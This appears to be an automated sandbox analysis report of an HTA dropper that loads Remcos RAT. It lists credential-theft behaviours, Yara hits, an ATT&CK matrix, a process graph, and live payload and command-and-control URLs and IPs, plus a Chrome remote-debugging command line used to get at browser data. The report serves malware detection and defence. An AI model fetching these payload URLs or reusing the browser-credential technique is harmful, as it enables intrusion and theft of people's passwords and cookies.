                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041739B GetVersionExW,18_2_0041739B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword19_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword19_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword19_2_00402DB3

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Detected Remcos RAT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts21
                    Native API                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		2
                    Obfuscated Files or Information                    		111
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts132
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Software Packing                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		2
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    DLL Side-Loading                    		3
                    Credentials In Files                    		3
                    File and Directory Discovery                    		Distributed Component Object Model111
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell                    		Network Logon Script322
                    Process Injection                    		1
                    Bypass User Account Control                    		LSA Secrets49
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials41
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557815 Sample: seethebestthingswhichhappen... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 78 nextnewupdationsforu.duckdns.org 2->78 80 15.164.165.52.in-addr.arpa 2->80 82 15 other IPs or domains 2->82 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 122 20 other signatures 2->122 13 mshta.exe 1 2->13         started        16 msedge.exe 2->16         started        19 svchost.exe 2->19         started        signatures3 120 Uses dynamic DNS services 78->120 process4 dnsIp5 152 Detected Cobalt Strike Beacon 13->152 154 Suspicious powershell command line found 13->154 156 PowerShell case anomaly found 13->156 21 powershell.exe 34 13->21         started        76 239.255.255.250 unknown Reserved 16->76 26 msedge.exe 16->26         started        28 msedge.exe 16->28         started        30 msedge.exe 16->30         started        signatures6 process7 dnsIp8 84 23.94.171.138, 49705, 55648, 80 AS-COLOCROSSINGUS United States 21->84 70 createthebestthing...tthingsformeeve.vbS, Unicode 21->70 dropped 72 C:\Users\user\AppData\...\hzf3qrfx.cmdline, Unicode 21->72 dropped 132 Detected Cobalt Strike Beacon 21->132 134 Suspicious powershell command line found 21->134 136 Obfuscated command line found 21->136 138 Found suspicious powershell code related to unpacking or dynamic code loading 21->138 32 wscript.exe 1 21->32         started        35 powershell.exe 21 21->35         started        37 csc.exe 3 21->37         started        40 conhost.exe 21->40         started        86 ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56, 443, 55664 MICROSOFT-CORP-MSN-AS-BLOCKUS United Kingdom 26->86 88 googlehosted.l.googleusercontent.com 172.217.16.193, 443, 55677 GOOGLEUS United States 26->88 90 sb.scorecardresearch.com 18.244.18.27, 443, 55693 AMAZON-02US United States 26->90 74 C:\Users\user\AppData\Local\...\Cookies, SQLite 26->74 dropped file9 signatures10 process11 file12 100 Detected Cobalt Strike Beacon 32->100 102 Suspicious powershell command line found 32->102 104 Wscript starts Powershell (via cmd or directly) 32->104 108 3 other signatures 32->108 42 powershell.exe 7 32->42         started        106 Loading BitLocker PowerShell Module 35->106 68 C:\Users\user\AppData\Local\...\hzf3qrfx.dll, PE32 37->68 dropped 45 cvtres.exe 1 37->45         started        signatures13 process14 signatures15 146 Detected Cobalt Strike Beacon 42->146 148 Suspicious powershell command line found 42->148 150 Obfuscated command line found 42->150 47 powershell.exe 15 16 42->47         started        51 conhost.exe 42->51         started        process16 dnsIp17 98 ip.1017.filemail.com 142.215.209.78, 443, 49706 HUMBER-COLLEGECA Canada 47->98 110 Writes to foreign memory regions 47->110 112 Injects a PE file into a foreign processes 47->112 53 CasPol.exe 47->53         started        signatures18 process19 dnsIp20 92 nextnewupdationsforu.duckdns.org 192.227.228.36, 14645, 55649, 55650 AS-COLOCROSSINGUS United States 53->92 94 geoplugin.net 178.237.33.50, 55651, 80 ATOM86-ASATOM86NL Netherlands 53->94 96 127.0.0.1 unknown unknown 53->96 124 Contains functionality to bypass UAC (CMSTPLUA) 53->124 126 Detected Remcos RAT 53->126 128 Attempt to bypass Chrome Application-Bound Encryption 53->128 130 8 other signatures 53->130 57 CasPol.exe 53->57         started        60 CasPol.exe 53->60         started        62 CasPol.exe 53->62         started        64 7 other processes 53->64 signatures21 process22 signatures23 140 Tries to steal Instant Messenger accounts or passwords 57->140 142 Tries to steal Mail credentials (via file / registry access) 57->142 144 Tries to harvest and steal browser information (history, passwords, etc) 60->144 66 msedge.exe 64->66         started        process24

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta22%ReversingLabsScript-JS.Trojan.Acsogenixx

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://23.94.171.138/329/createt0%Avira URL Cloudsafe
                    http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF0%Avira URL Cloudsafe
                    http://23.94.171.138/329/FRSSDE.txt0%Avira URL Cloudsafe
                    http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF50%Avira URL Cloudsafe
                    https://tunnel-staging.googlezip.net/20%Avira URL Cloudsafe
                    https://aka..FT_0%Avira URL Cloudsafe
                    http://tls-tunnel-check.googlezip.net/connect20%Avira URL Cloudsafe
                    nextnewupdationsforu.duckdns.org100%Avira URL Cloudmalware
                    http://23.94.171.138/0%Avira URL Cloudsafe
                    https://googleusercontent.comb0%Avira URL Cloudsafe
                    https://www.privacysandbox.comb0%Avira URL Cloudsafe
                    http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEM0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		18.244.18.27
                        		truefalse
                          		high
                          ip.1017.filemail.com
                          		142.215.209.78
                          		truefalse
                            		high
                            nextnewupdationsforu.duckdns.org
                            		192.227.228.36
                            		truetrue
                              		unknown
                              googlehosted.l.googleusercontent.com
                              		172.217.16.193
                              		truefalse
                                		high
                                sni1gl.wpc.nucdn.net
                                		152.199.21.175
                                		truefalse
                                  		high
                                  clients2.googleusercontent.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    bzib.nelreports.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      assets.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        15.164.165.52.in-addr.arpa
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          c.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            ntp.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              api.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                1017.filemail.com
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://23.94.171.138/329/FRSSDE.txttrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  nextnewupdationsforu.duckdns.orgtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                                                    		high
                                                    http://geoplugin.net/json.gpfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://23.94.171.138/329/createtpowershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.google.com/coacbEchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF5powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://1017.filemail.compowershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka..FT_powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://go.microspowershell.exe, 00000003.00000002.1476840604.000000000510D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.comCasPol.exefalse
                                                                		high
                                                                http://crl.microsopowershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://google-ohttp-relay-safebrowsing.fastly-edge.com/bchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://login.yahoo.com/config/loginCasPol.exefalse
                                                                              		high
                                                                              http://www.microsoft.cpowershell.exe, 00000003.00000002.1480842016.0000000007465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.nirsoft.net/CasPol.exefalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1589019492.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1476840604.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2380307874.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000004C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_XS_Delay_GA4Kids_20230926chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://nonexistent.googlezip.net/chrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://googleusercontent.combchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplaychrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://tunnel-staging.googlezip.net/2chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1597053881.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1478768021.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/7chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.google.com/chromesuggestionsJKchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.imvu.comCasPol.exefalse
                                                                                                              		high
                                                                                                              https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://dns-tunnel-check.googlezip.net/connect2chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
